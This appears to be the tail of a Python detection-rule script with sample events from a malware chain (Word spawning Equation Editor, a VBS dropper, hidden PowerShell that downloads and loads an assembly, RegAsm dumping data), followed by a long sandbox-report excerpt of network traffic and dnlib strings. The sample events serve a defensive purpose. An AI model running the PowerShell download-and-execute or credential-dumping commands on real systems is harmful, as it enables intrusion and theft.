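SAMPLE_EVENTS: List[Event] = [
    _proc(1, 3680, EQN, f'"{EQN}" -Embedding',
          r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", 3320),
    {"RecordId": 2, "EventID": 3, "ProcessId": 3680, "Image": EQN,
     "DestinationIp": "85.239.241.184", "DestinationPort": 80},
    _proc(3, 3744, r"C:\Windows\SysWOW64\wscript.exe",
          r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"',
          EQN, 3680),
    _proc(4, 3884, PS,  # abridged stage-2 command; parent PID 3796 assumed to be stage 1
          '"powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command '
          '"$imageBytes = $webClient.DownloadData($imageUrl);'
          '$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)"',
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 3796),
    _proc(5, 4084, REGASM,
          f'{REGASM} /stext "C:\\Users\\user\\AppData\\Local\\Temp\\ibmyilijkzqgggcoxzdgfu"',
          REGASM, 3988),
    # invented benign control: an ordinary interactive PowerShell
    _proc(6, 5000, PS, '"powershell.exe" -NoProfile -command "Get-Process"',
          r"C:\Windows\explorer.exe", 1234),
]


if __name__ == "__main__":
    for rid, names in evaluate(SAMPLE_EVENTS).items():
        print(f"record {rid}: {', '.join(names)}")
```

Every event of the chain except the benign control trips at least one rule, and the two Equation Editor rules fire on parentage and network activity alone, without depending on any file name or URL from this sample; those are the durable detections, whereas the PowerShell and RegAsm rules key on command-line content that a later build can trivially change.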

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
                    Source: unknown | HTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: unknown | HTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49166 version: TLS 1.2
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
